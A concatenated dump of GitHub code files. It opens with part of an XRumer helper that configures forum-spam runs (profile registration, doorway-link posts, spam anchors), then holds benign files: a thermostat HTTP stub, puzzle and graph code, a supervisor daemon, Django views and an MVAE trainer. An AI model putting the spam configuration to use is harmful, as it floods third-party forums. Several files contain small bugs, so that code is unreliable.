'post', 'ZLinksList', 160, projSubject, projBody)\n else:\n self.agent._CreateSettings('none', '', 'post-reply', 'LinksList', 160, projSubject, projBody)\n \n def ActionOff(self):\n '''Копируем анкоры и фильтруем базу R от неуспешных'''\n self.linker.AddSpamAnchorsFile()\n if self.currentTask['baseType'] == 'RLinksList':\n self._FilterBase(self.agent.baseMainRFile)\n elif self.currentTask['baseType'] == 'ZLinksList':\n self.agent._CountLinks('baseLinksCount', self.agent.baseMainZFile, 'base')\n else:\n self.agent._CountLinks('baseLinksCount', self.agent.baseMainFile, 'base')\n\nclass XrumerHelperSpamProfileTask(XrumerHelper):\n '''Задание для спама по профилям'''\n \n def __init__(self, agent):\n '''Обработка параметров агента'''\n super(XrumerHelperSpamProfileTask, self).__init__(agent)\n self.randomizeNames = True # профили регистрируем всегда от рандомных пользователей\n\n def GetProjectName(self):\n return 'ProjectP%d' % self.currentTask['id']\n \n def ActionOn(self):\n '''Содержимое проекта'''\n projSubject = '#file_links[%s,1,N]' % (self.keywordsFileEsc)\n projBody = r'#file_links[x:\\foo.txt,1,N]'\n projHomePage = self.currentTask['homePage']\n projSignature = self.currentTask['signature']\n '''Создаем настройки'''\n self.agent._CreateSettings('register-only', 'edit-profile', 'post', 'LinksList', 110, projSubject, projBody, projHomePage, projSignature)\n '''Удаляем логи'''\n self.agent._DeleteLog(self.agent.logAnchors)\n self.agent._DeleteLog(self.agent.logProfiles)\n \n def ActionOff(self):\n '''Фильтруем базу от неуспешных и копируем профили для последующего спама'''\n #self._FilterBase(self.agent.baseMainFile)\n self.linker.AddProfilesFile()\n\nclass XrumerHelperBaseDoors(XrumerHelper):\n '''Доры на форумах'''\n \n def GetProjectName(self):\n return 'ProjectD%d' % self.currentTask['id']\n \n def ActionOn(self):\n '''Содержимое проекта'''\n body = escape(self.currentTask['body'])\n projSubject = '#file_links[%s,1,N]' % (self.keywordsFileEsc)\n projBody = '%s #file_links[%s,10,L] #file_links[%s,3,L] #file_links[%s,3,L] #file_links[%s,10,S]' % (body, self.keywordsFileEsc, self.anchorsFileEsc, self.profilesFileEsc, self.snippetsFileEsc)\n '''Если первый проход'''\n if not os.path.isfile(self.agent.baseMainRFile):\n '''Пишем кейворды, копируем исходную базу в целевую и удаляем существующую базу R'''\n self._WriteKeywords()\n self._CopyBase(self.agent.baseSourceFile, self.agent.baseMainFile)\n self._DeleteBase(self.agent.baseMainRFile) \n '''Создаем настройки'''\n threadsCount = 110\n if self.creationType == 'post':\n self.agent._CreateSettings('none', '', 'post', 'LinksList', threadsCount, projSubject, projBody)\n elif self.creationType == 'reply':\n self.agent._CreateSettings('none', '', 'reply', 'LinksList', threadsCount, projSubject, projBody)\n elif self.creationType == 'reg + post' and self.registerRun:\n self.agent._CreateSettings('register-only', '', 'post', 'LinksList', threadsCount, projSubject, projBody)\n elif self.creationType == 'reg + post' and not self.registerRun:\n self.agent._CreateSettings('from-registered', '', 'post', 'LinksList', threadsCount, projSubject, projBody)\n elif self.creationType == 'reg + reply' and self.registerRun:\n self.agent._CreateSettings('register-only', '', 'reply', 'LinksList', threadsCount, projSubject, projBody)\n elif self.creationType == 'reg + reply' and not self.registerRun:\n self.agent._CreateSettings('from-registered', '', 'reply', 'LinksList', threadsCount, projSubject, projBody)\n else:\n '''Пишем кейворды'''\n self._WriteKeywords()\n '''Создаем настройки'''\n self.agent._CreateSettings('from-registered', '', 'reply', 'RLinksList', 160, projSubject, projBody)\n \n def ActionOff(self):\n '''Копируем анкоры, фильтруем базу R от неуспешных и удаляем базу, которую копировали ранее'''\n self.linker.AddDoorsAnchorsFile()\n self._FilterBase(self.agent.baseMainRFile)\n self._DeleteBase(self.agent.baseMainFile) \n","repo_name":"bizonix/doorscenter","sub_path":"doorsagents/xrumercls.py","file_name":"xrumercls.py","file_ext":"py","file_size_in_byte":14068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"16997072919","text":"#\n# http://*\n#\n# The thermostat downloads release notes using a full URL. This\n# module replies to any full URL request with a simple text file\n# to replace the official release nodes.\n#\n\nimport logging\n\nfrom .httpobj import HttpRequest, HttpResponse, addUrl\n\n_LOGGER: logging.Logger = logging.getLogger(__package__)\n\ndef urlRelNodes(request):\n\n hostAndPath = request.pathDict['hostAndPath']\n\n _LOGGER.info(\"Fetch http://{}\".format(hostAndPath))\n\n bodyStr = \"Returned from python server\"\n\n response = HttpResponse.okResponse()\n\n response.headers.append((\"Cache-Control\", \"no-store,no-cache\"))\n response.headers.append((\"Pragma\", \"no-cache\"))\n response.addContentLengthHeader(len(bodyStr))\n response.addContentTypeHeader(\"text/plain\")\n response.addRequestContextHeader()\n response.headers.append((\"X-Content-CRC\", \"1278\"))\n response.headers.append((\"X-Current-Page\", \"http://{}\".format(hostAndPath)))\n # Cookie\n response.addDateHeader()\n\n response.body = bodyStr\n\n return response\n\n\n\naddUrl(\"http://(?P.+)$\", urlRelNodes)\n","repo_name":"nfriess/carrier_infinity","sub_path":"custom_components/carrier_infinity/urlrelnodes.py","file_name":"urlrelnodes.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"50"} +{"seq_id":"12684392326","text":"from lib.parse import parse_strings\nfrom collections import deque, defaultdict\n\ndef get_high_score(use_multiplier: bool = False) -> int:\n data = parse_strings(\"2018/day9/input.txt\")[0]\n d = data.split(\" \")\n players, final_marble = int(d[0]), int(d[6])\n scores, circle = defaultdict(int), deque([0])\n if use_multiplier:\n final_marble *= 100\n\n for marble in range(1, final_marble+1):\n elf = marble % players\n\n if marble % 23 == 0:\n circle.rotate(7)\n scores[elf] += marble + circle.pop()\n circle.rotate(-1)\n else:\n circle.rotate(-1)\n circle.append(marble)\n \n return max(scores.values())\n\nprint(get_high_score())\nprint(get_high_score(use_multiplier=True))\n\n","repo_name":"JoshHumpherey/advent-of-code","sub_path":"2018/day9/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"14969975003","text":"#!/usr/bin/env python3\n\nimport logging\nimport os\nimport sys\nimport time\nimport argparse\nimport subprocess\nimport datetime\nimport psutil\nimport schedule\n\n# Add some help and read parameters\nparser = argparse.ArgumentParser(description=\"\"\" Small supervising daemon \"\"\")\nparser.add_argument(\n \"--process\", default=\"sleep\", help=\"Process to monitor. Default: sleep\"\n)\nparser.add_argument(\n \"--command\", default=\"sleep 20 &\", help=\"Command to start daemon. Default: sleep 20\"\n)\nparser.add_argument(\n \"--interval\",\n type=int,\n default=3,\n help=\"Interval between checks in seconds. Default: 3\",\n)\nparser.add_argument(\n \"--retry\", type=int, default=3, help=\"Attempts to restart failed daemon. Default: 3\"\n)\nparser.add_argument(\n \"--wait\",\n type=int,\n default=3,\n help=\"Time to wait between restarts in seconds. Default: 3\",\n)\nparser.add_argument(\n \"--log\", default=\"no\", help=\"Enable logging. Options: yes/no. Default: no\"\n)\nargs = parser.parse_args()\n\n\n# Boolean: Check if process is running\ndef checkProcess(procName):\n for proc in psutil.process_iter():\n try:\n if procName in proc.name():\n return True\n except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):\n pass\n return False\n\n\n# Void: Writes log files if logging is enabled\ndef logger(message):\n log = args.log.lower()\n now = datetime.datetime.now()\n print(str(now.strftime(\"%d-%m-%Y %H:%M:%S\")) + \": \" + message)\n if log == \"yes\":\n logging.info(message)\n else:\n return\n\n\n# Void: Runs check and restarts service\ndef check_run():\n # Load variables from config\n proc_name = args.proccess\n attempt = args.retry\n start_command = args.command\n time_wait = args.wait\n # Init counter\n current_attempt = 0\n # Is daemon alive? Then ok\n if checkProcess(proc_name):\n logger(proc_name + \" is running. Waiting...\")\n # Oops, daemon is dead. Let's try to restart it\n else:\n logger(proc_name + \" is not running! restarting\")\n # Do not try so hard\n while current_attempt < attempt:\n logger(\"Restarting attempt: \" + str(current_attempt + 1))\n logger(\"Running: \" + start_command)\n # Wait between restarts\n if current_attempt > 0:\n time.sleep(time_wait)\n # Start it and get exit code\n p = subprocess.run(start_command, shell=True)\n logger(\"Start program exit code: \" + str(p.returncode))\n # Bump counter\n current_attempt += 1\n # If daemon started and have not died after successful start - happiness\n if p.returncode == 0 and checkProcess(proc_name):\n break\n # If not and we exhausted all attempts - sadness. requires restart to continue monitoring\n if current_attempt >= attempt:\n logger(\"Failed to restart service\")\n sys.exit()\n\n\ndef main() -> None:\n # Set path to log and pid file\n logfile = os.path.join(os.getcwd(), \"supervisor.log\")\n interval_sec = args.interval\n run_schedule = True\n # Configure logging\n logging.basicConfig(\n filename=logfile,\n level=logging.INFO,\n datefmt=\"%d-%m-%Y %H:%M:%S\",\n format=\"%(asctime)s: %(message)s\",\n )\n\n # Start schedule with configured interval\n schedule.every(interval_sec).seconds.do(check_run)\n # While we still try to revive daemon - run scheduler\n while run_schedule:\n schedule.run_pending()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"supaflyster/supervisord","sub_path":"supervisor-cli.py","file_name":"supervisor-cli.py","file_ext":"py","file_size_in_byte":3579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"16429531263","text":"def dijkstra(vertices, arestas, u, v):\r\n beta = {}\r\n phi = {}\r\n pi = {}\r\n\r\n for i in range(len(vertices)):\r\n beta[vertices[i]] = float('inf')\r\n phi[vertices[i]] = 0\r\n pi[vertices[i]] = 0\r\n\r\n verificacao = 0\r\n\r\n beta[u] = 0\r\n phi[u] = 1\r\n pi[u] = \"-\"\r\n w = u\r\n\r\n while (w != v):\r\n\r\n verificacao_2 = 0\r\n\r\n for j in arestas:\r\n if (j[0] == w):\r\n if phi[j[2]] == 0 and beta[j[2]] > beta[w] + 1:\r\n beta[j[2]] = beta[w] + 1\r\n pi[j[2]] = w\r\n verificacao_2 += 1\r\n\r\n min_beta = float('inf')\r\n\r\n for k in vertices:\r\n if phi[k] == 0 and beta[k] < float('inf'):\r\n if beta[k] < min_beta:\r\n min_beta = beta[k]\r\n\r\n if verificacao_2 == 0 and min_beta == float('inf'):\r\n verificacao += 1\r\n break\r\n\r\n for l in vertices:\r\n if beta[l] == min_beta and phi[l] == 0 and beta[l] < float('inf'):\r\n phi[l] = 1\r\n w = l\r\n break\r\n\r\n if verificacao == 1:\r\n return False\r\n\r\n else:\r\n atual = v\r\n lista = []\r\n\r\n while atual != u:\r\n for m in pi:\r\n if m == atual:\r\n lista.append(atual)\r\n atual = pi[atual]\r\n break\r\n\r\n lista.append(atual)\r\n\r\n return len(lista) - 1, lista[::-1]\r\n\r\ndef DijkstraCarga(vertices, arestas, u, v, carga, recarga):\r\n\r\n comeco = u\r\n recarga.insert(0, u)\r\n recarga.append(v)\r\n\r\n possibilidades = {}\r\n\r\n for i in range(len(recarga)):\r\n for j in range(len(recarga)):\r\n\r\n if u == recarga[j] or dijkstra(vertices, arestas, u, recarga[j]) == False:\r\n continue\r\n\r\n caminho = dijkstra(vertices, arestas, u, recarga[j])[0]\r\n\r\n if caminho <= carga:\r\n possibilidades[u + \"-\" + recarga[j]] = caminho\r\n u = recarga[i]\r\n if i > 0:\r\n carga = 5\r\n\r\n lista = dijkstra(recarga, possibilidades, comeco, v)\r\n\r\n if lista == False:\r\n\r\n return \"Não há caminho !\"\r\n\r\n caminho_2 = []\r\n caminho_final = []\r\n\r\n for i in range(len(lista[1])-1):\r\n caminho_2.append(dijkstra(vertices, arestas, lista[1][i], lista[1][i+1])[1])\r\n\r\n for i in range(len(caminho_2)):\r\n for j in range(len(caminho_2[i])):\r\n if (caminho_2[i][j] not in caminho_final):\r\n caminho_final.append(caminho_2[i][j])\r\n\r\n return caminho_final","repo_name":"ramonsilva186/Grafos","sub_path":"roteiro 7/dijkstraCarga.py","file_name":"dijkstraCarga.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"73538667354","text":"#!/usr/bin/env python\nimport pickle\n#from pylab import *\nimport matplotlib.pyplot as plt\nfrom pylab import transpose,where\nimport numpy as np\n\ndata = pickle.load(open(\"data/data.pkl\",'r'))\nparam0,turn = transpose(data)\nymax2 = 275.0 / len(data)\n\ndef to_percentage(y,pos):\n ret = round(y * 100.0, 2)\n return str(ret) #+ '%'\n#str(round( ( y / float(len(data)) ) * 100.0, 2)) + '%'\n\nidx = [38, 35, 33, 31, 28] \n#clr = 'rgb'\n\nfig,ax_array = plt.subplots(len(idx),1)\nfig.set_figheight(15.0)\nfig.set_figwidth(9.0)\n\nc1 = tuple(np.array([255,165,0,125])/255.)\nc2 = tuple(np.array([0,128,0,200])/255.)\n\nfor (t,i,ax1) in zip(idx,range(len(idx)),ax_array):\n \n #add_subplot(3, 1, i + 1) # draw the (i+1)th bar plot\n ax2 = ax1.twinx()\n ax2.yaxis.set_major_formatter(plt.FuncFormatter(to_percentage))\n #ax2.set_yticks([0,.02,.04,.06,.08])\n #ax2.set_ylim([0,.08])\n\n hist_data = param0[where(turn == t)[0]]\n weights = np.ones_like(hist_data) #/ len(hist_data)\n \n print (275.0/len(hist_data)),ymax2,len(hist_data),len(data)\n ax2.set_yticks(np.linspace(0.0, ymax2, 6)) #[0,.02,.04,.06,.08])\n ax2.set_ylim([0, ymax2])\n\n# ax2.hist(hist_data, bins=30, color=c1, weights=weights/len(hist_data))\n\n ax1.hist(hist_data, bins=30, color=c2)\n ax1.set_xlim(0.0, 1.0)\n ax1.set_ylim(0, 275)\n #ax1.set_yticks([\n #ax2.set_title(\"P($p_0$ | $t_e$ = %d)\"%(t,))\n ax1.text(.5, .88, \"P($p_0$ | $t_e$ = %d)\"%(t,),\n horizontalalignment='center',\n transform=ax1.transAxes,\n fontsize=16)\n if i == 2: ax1.set_ylabel(\"frequency\", fontsize=16)\n if i == 2: ax2.set_ylabel(\"probability $\\\\times$ 100\", fontsize=16)\n\n if i + 1 < len(idx): ax1.get_xaxis().set_visible(False)\n\nax1.set_xlabel(\"$p_0$ (Village-to-Chancellor buy ratio)\",fontsize=16)\nplt.savefig(\"3-row-dist.png\")\n\n","repo_name":"cronburg/150-ppl","sub_path":"proj/plotPaper.py","file_name":"plotPaper.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"28631263657","text":"from django.db import models\n\n\nclass Fazenda(models.Model):\n nome = models.CharField(max_length=20, default='Sem nome')\n receita = models.IntegerField()\n gasto_previsto = models.IntegerField()\n data_receita_inicial = models.CharField(max_length=20)\n\n def __str__(self):\n return \"Nome: \" + self.nome + \" / Receita: \" + str(self.receita)\n \n def get_quantidade_total_materiais(self):\n quantidades = {\n \"madeira\": 0,\n \"pedra\": 0,\n \"minério de ferro\": 0,\n \"carvão\": 0\n }\n tarefas = self.tarefa_set.all()\n for tarefa in tarefas:\n materiais = tarefa.material_set.all()\n quantidades = Fazenda.soma_quantidade_total_materiais(quantidades, materiais)\n\n return quantidades\n \n def soma_quantidade_total_materiais(quantidades, materiais):\n for material in materiais:\n if material.tipo.lower() in quantidades:\n quantidades[material.tipo.lower()]+= material.quantidade\n return quantidades\n \n def get_gasto_previsto(self):\n tarefas = self.tarefa_set.all()\n soma = 0\n for tarefa in tarefas: \n if not tarefa.feito:\n soma += tarefa.custo\n\n return soma\n ","repo_name":"roselmamendes/stardew-planner","sub_path":"planner/models/fazenda.py","file_name":"fazenda.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"11435481699","text":"#from django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.parsers import JSONParser\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom games.models import Game\nfrom games.serializers import GameSerializer\n\n# Create your views here.\n# rest_framework.response.Response 로 대체 한다.\n'''\nclass JSONResponse(HttpResponse):\n def __init__(self, data, **kwargs):\n content = JSONRenderer().render(data)\n kwargs['content_type'] = 'application/json'\n super(JSONResponse, self).__init__(content, **kwargs)\n'''\n\n# 데커레이터\n@csrf_exempt\n@api_view(['GET', 'POST'])\ndef game_list(request):\n # 모든 게임을 나열\n if request.method == 'GET':\n games = Game.objects.all()\n games_serializer = GameSerializer(games, many=True)\n return Response(games_serializer.data)\n #return JSONResponse(games_serializer.data)\n # 새로운 게임을 생성\n elif request.method == 'POST':\n #game_data = JSONParser().parse(request)\n game_serializer = GameSerializer(data=request.data)\n if game_serializer.is_valid():\n game_serializer.save()\n return Response(game_serializer.data, status=status.HTTP_201_CREATED)\n #return JSONResponse(game_serializer.data, status=status.HTTP_201_CREATED)\n \n return Response(game_serializer.error, status=status.HTTP_400_BAD_REQUEST)\n #return JSONResponse(game_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n@csrf_exempt\n@api_view(['GET', 'PUT', 'POST'])\ndef game_detail(request, pk): # 기존 게임을 검색, 업데이트, 삭제한다. pk는 게임의 기본키 또는 식별자\n try:\n game = Game.objects.get(pk=pk)\n except Game.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)\n #return HttpResponse(status=status.HTTP_404_NOT_FOUND)\n # 게임 데이터 반환\n if request.method == 'GET':\n game_serializer = GameSerializer(game)\n return Response(game_serializer.data)\n #return JSONResponse(game_serializer.data)\n # request 요청에 포함된 json 데이터로 새 게임을 만들어 기존 게임을 대체한다.\n elif request.method == 'PUT':\n #game_data = JSONParser().parse(request)\n game_serializer = GameSerializer(game, data=request.data)\n if game_serializer.is_valid():\n game_serializer.save()\n return Response(game_serializer.data)\n #return JSONResponse(game_serializer.data)\n return Response(game_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n #return JSONResponse(game_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \n elif request.method == 'DELETE':\n game.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n #return HttpResponse(status=status.HTTP_204_NO_CONTENT)","repo_name":"jundol-k/PythonREST","sub_path":"Django01/gamesapi/games/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"7747362581","text":"from tkinter import Frame, Label, Entry, StringVar, CENTER\n\nfrom src.utils.constants import Color, Misc\n\n\nclass HorseEntry:\n\n def __init__(\n self,\n parent_widget,\n entries: int,\n pady: int\n ):\n frame = Frame(parent_widget)\n\n label_style, entry_style = 'Times 16 bold', 'Times 18'\n self.entries, self.numbers = entries, []\n\n for i in range(1, entries + 1):\n Label(frame, text=Misc.ORDINALS[i], font=label_style) \\\n .grid(row=1, column=i, padx=20, pady=5)\n\n number = StringVar()\n entry = Entry(\n frame,\n textvariable=number,\n font=entry_style,\n fg=Color.RED,\n width=5,\n borderwidth=5,\n justify=CENTER,\n validate='key',\n )\n entry.configure(vcmd=(entry.register(self.check_digit), '%d', '%P'))\n entry.grid(row=2, column=i, padx=20, pady=5)\n self.numbers.append(number)\n\n frame.pack(pady=pady)\n\n def set_values(self, values: [int]):\n if len(values) <= self.entries:\n for i in range(len(values)):\n self.numbers[i].set(values[i])\n\n def get_values(self) -> [int]:\n strings = [n.get() for n in self.numbers]\n numbers = []\n\n for s in strings:\n try:\n n = int(s)\n if (0 < n < 15) and (n not in numbers):\n numbers.append(n)\n except:\n pass\n\n return numbers\n\n def clear(self):\n for number in self.numbers:\n number.set('')\n\n @staticmethod\n def check_digit(action_type: str, input_text: str):\n # validate only on insertion\n if action_type == '1':\n return input_text.isdigit()\n\n return True\n","repo_name":"lethal-weapon/the-tipper","sub_path":"src/ui/horse_entry.py","file_name":"horse_entry.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"29840386497","text":"from __future__ import division\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\nimport os\nimport sys\nimport shutil\nimport numpy as np\nfrom tqdm import tqdm\nfrom itertools import combinations\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom torchvision import transforms\n\nfrom model import MVAE\n\nsys.path.append('../celeba')\nfrom datasets import N_ATTRS\nfrom datasets import CelebAttributes\n\n\ndef elbo_loss(recon, data, mu, logvar, lambda_image=1.0, \n lambda_attrs=1.0, annealing_factor=1.):\n \"\"\"Compute the ELBO for an arbitrary number of data modalities.\n\n @param recon: list of torch.Tensors/Variables\n Contains one for each modality.\n @param data: list of torch.Tensors/Variables\n Size much agree with recon.\n @param mu: Torch.Tensor\n Mean of the variational distribution.\n @param logvar: Torch.Tensor\n Log variance for variational distribution.\n @param lambda_image: float [default: 1.0]\n weight for image BCE\n @param lambda_attr: float [default: 1.0]\n weight for attribute BCE\n @param annealing_factor: float [default: 1]\n Beta - how much to weight the KL regularizer.\n \"\"\"\n assert len(recon) == len(data), \"must supply ground truth for every modality.\"\n n_modalities = len(recon)\n batch_size = mu.size(0)\n\n BCE = 0 # reconstruction cost\n for ix in xrange(n_modalities):\n # dimensionality > 1 implies an image\n if len(recon[ix].size()) > 1:\n recon_ix = recon[ix].view(batch_size, -1)\n data_ix = data[ix].view(batch_size, -1)\n BCE += lambda_image * torch.sum(binary_cross_entropy_with_logits(recon_ix, data_ix), dim=1)\n else: # this is for an attribute\n BCE += lambda_attrs * binary_cross_entropy_with_logits(recon[ix], data[ix])\n KLD = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp(), dim=1)\n ELBO = torch.mean(BCE + annealing_factor * KLD)\n return ELBO\n\n\ndef binary_cross_entropy_with_logits(input, target):\n \"\"\"Sigmoid Activation + Binary Cross Entropy\n\n @param input: torch.Tensor (size N)\n @param target: torch.Tensor (size N)\n @return loss: torch.Tensor (size N)\n \"\"\"\n if not (target.size() == input.size()):\n raise ValueError(\"Target size ({}) must be the same as input size ({})\".format(\n target.size(), input.size()))\n\n return (torch.clamp(input, 0) - input * target \n + torch.log(1 + torch.exp(-torch.abs(input))))\n\n\ndef tensor_2d_to_list(x):\n # convert a 2D tensor to a list of 1D tensors.\n n_dims = x.size(1)\n list_of_tensors = []\n for i in xrange(n_dims):\n list_of_tensors.append(x[:, i])\n return list_of_tensors\n\n\ndef enumerate_combinations(n):\n \"\"\"Enumerate entire pool of combinations.\n \n We use this to define the domain of ELBO terms, \n (the pool of 2^19 ELBO terms).\n\n @param n: integer\n number of features (19 for Celeb19)\n @return: a list of ALL permutations\n \"\"\"\n combos = []\n for i in xrange(2, n): # 1 to n - 1\n _combos = list(combinations(range(n), i))\n combos += _combos\n\n combos_np = np.zeros((len(combos), n))\n for i in xrange(len(combos)):\n for idx in combos[i]:\n combos_np[i][idx] = 1\n\n combos_np = combos_np.astype(np.bool)\n return combos_np\n\n\ndef sample_combinations(pool, size=1):\n \"\"\"Return boolean list of which data points to use to compute a modality.\n Ignore combinations that are all True or only contain a single True.\n\n @param pool: np.array\n enumerating all possible combinations.\n @param size: integer (default: 1)\n number of combinations to sample.\n \"\"\"\n n_modalities = pool.shape[1]\n pool_size = len(pool)\n pool_sums = np.sum(pool, axis=1)\n pool_dist = np.bincount(pool_sums)\n pool_space = np.where(pool_dist > 0)[0]\n\n sample_pool = np.random.choice(pool_space, size, replace=True)\n sample_dist = np.bincount(sample_pool)\n if sample_dist.size < n_modalities:\n zeros_pad = np.zeros(n_modalities - sample_dist.size).astype(np.int)\n sample_dist = np.concatenate((sample_dist, zeros_pad))\n \n sample_combo = []\n for ix in xrange(n_modalities):\n if sample_dist[ix] > 0:\n pool_i = pool[pool_sums == ix]\n combo_i = np.random.choice(range(pool_i.shape[0]), \n size=sample_dist[ix], \n replace=False)\n sample_combo.append(pool_i[combo_i])\n\n sample_combo = np.concatenate(sample_combo)\n return sample_combo\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n\ndef save_checkpoint(state, is_best, folder='./', filename='checkpoint.pth.tar'):\n if not os.path.isdir(folder):\n os.mkdir(folder)\n torch.save(state, os.path.join(folder, filename))\n if is_best:\n shutil.copyfile(os.path.join(folder, filename),\n os.path.join(folder, 'model_best.pth.tar'))\n\n\ndef load_checkpoint(file_path, use_cuda=False):\n checkpoint = torch.load(file_path) if use_cuda else \\\n torch.load(file_path, map_location=lambda storage, location: storage)\n model = MVAE(checkpoint['n_latents'])\n model.load_state_dict(checkpoint['state_dict'])\n return model\n\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--n-latents', type=int, default=100,\n help='size of the latent embedding [default: 100]')\n parser.add_argument('--batch-size', type=int, default=100, metavar='N',\n help='input batch size for training [default: 100]')\n parser.add_argument('--epochs', type=int, default=100, metavar='N',\n help='number of epochs to train [default: 100]')\n parser.add_argument('--annealing-epochs', type=int, default=20, metavar='N',\n help='number of epochs to anneal KL for [default: 20]')\n parser.add_argument('--lr', type=float, default=1e-4, metavar='LR',\n help='learning rate [default: 1e-4]')\n parser.add_argument('--log-interval', type=int, default=10, metavar='N',\n help='how many batches to wait before logging training status [default: 10]')\n parser.add_argument('--approx-m', type=int, default=1,\n help='number of ELBO terms to approx. the full MVAE objective [default: 1]')\n parser.add_argument('--lambda-image', type=float, default=1.,\n help='multipler for image reconstruction [default: 1]')\n parser.add_argument('--lambda-attrs', type=float, default=10.,\n help='multipler for attributes reconstruction [default: 10]')\n parser.add_argument('--cuda', action='store_true', default=False,\n help='enables CUDA training [default: False]')\n args = parser.parse_args()\n args.cuda = args.cuda and torch.cuda.is_available()\n\n if not os.path.isdir('./trained_models'):\n os.makedirs('./trained_models')\n\n # crop the input image to 64 x 64\n preprocess_data = transforms.Compose([transforms.Resize(64),\n transforms.CenterCrop(64),\n transforms.ToTensor()])\n\n train_loader = torch.utils.data.DataLoader(\n CelebAttributes(partition='train', data_dir='./data',\n image_transform=preprocess_data),\n batch_size=args.batch_size, shuffle=True)\n N_mini_batches = len(train_loader)\n test_loader = torch.utils.data.DataLoader(\n CelebAttributes(partition='val', data_dir='./data',\n image_transform=preprocess_data),\n batch_size=args.batch_size, shuffle=False)\n\n model = MVAE(args.n_latents)\n optimizer = optim.Adam(model.parameters(), lr=args.lr)\n \n if args.cuda:\n model.cuda()\n\n # enumerate all combinations so we can sample from this\n # every gradient step. NOTE: probably not the most efficient\n # way to do this but oh well.\n combination_pool = enumerate_combinations(19)\n\n\n def train(epoch):\n model.train()\n train_loss_meter = AverageMeter()\n\n for batch_idx, (image, attrs) in enumerate(train_loader):\n if epoch < args.annealing_epochs:\n # compute the KL annealing factor for the current mini-batch in the current epoch\n annealing_factor = (float(batch_idx + (epoch - 1) * N_mini_batches + 1) /\n float(args.annealing_epochs * N_mini_batches))\n else:\n # by default the KL annealing factor is unity\n annealing_factor = 1.0\n\n if args.cuda:\n image = image.cuda()\n attrs = attrs.cuda()\n image = Variable(image)\n attrs = Variable(attrs)\n attrs = tensor_2d_to_list(attrs) # convert tensor to list\n batch_size = len(image)\n\n # refresh the optimizer\n optimizer.zero_grad()\n\n train_loss = 0 # accumulate train loss here so we don't store a lot of things.\n n_elbo_terms = 0 # track number of ELBO terms\n\n # compute ELBO using all data (``complete\")\n recon_image, recon_attrs, mu, logvar = model(image, attrs)\n train_loss += elbo_loss([recon_image] + recon_attrs, [image] + attrs, mu, logvar, \n lambda_image=args.lambda_image, lambda_attrs=args.lambda_attrs,\n annealing_factor=annealing_factor)\n n_elbo_terms += 1 # keep track of how many terms there are\n\n # compute ELBO using only image data\n recon_image, _, mu, logvar = model(image=image)\n train_loss += elbo_loss([recon_image], [image], mu, logvar, \n lambda_image=args.lambda_image, lambda_attrs=args.lambda_attrs,\n annealing_factor=annealing_factor)\n n_elbo_terms += 1 # keep track of how many terms there are\n \n # compute ELBO using only text data\n for ix in xrange(len(attrs)):\n _, recon_attrs, mu, logvar = model(attrs=[attrs[k] if k == ix else None \n for k in xrange(len(attrs))])\n train_loss += elbo_loss([recon_attrs[ix]], [attrs[ix]], mu, logvar, \n annealing_factor=annealing_factor)\n n_elbo_terms += 1\n\n # sample some number of terms\n if args.approx_m > 0:\n sample_combos = sample_combinations(combination_pool, size=args.approx_m)\n for sample_combo in sample_combos:\n attrs_combo = sample_combo[1:]\n recon_image, recon_attrs, mu, logvar = model(image=image if sample_combo[0] else None, \n attrs=[attrs[ix] if attrs_combo[ix] else None \n for ix in xrange(attrs_combo.size)])\n if sample_combo[0]: # check if image is present\n elbo = elbo_loss([recon_image] + [recon_attrs[ix] for ix in xrange(attrs_combo.size) if attrs_combo[ix]],\n [image] + [attrs[ix] for ix in xrange(attrs_combo.size) if attrs_combo[ix]],\n mu, logvar, annealing_factor=annealing_factor)\n else:\n elbo = elbo_loss([recon_attrs[ix] for ix in xrange(attrs_combo.size) if attrs_combo[ix]],\n [attrs[ix] for ix in xrange(attrs_combo.size) if attrs_combo[ix]],\n mu, logvar, annealing_factor=annealing_factor)\n train_loss += elbo\n n_elbo_terms += 1\n\n assert n_elbo_terms == (len(attrs) + 1) + 1 + args.approx_m # N + 1 + M\n train_loss_meter.update(train_loss.data[0], len(image))\n \n # compute and take gradient step\n train_loss.backward()\n optimizer.step()\n\n if batch_idx % args.log_interval == 0:\n print('Train Epoch: {} 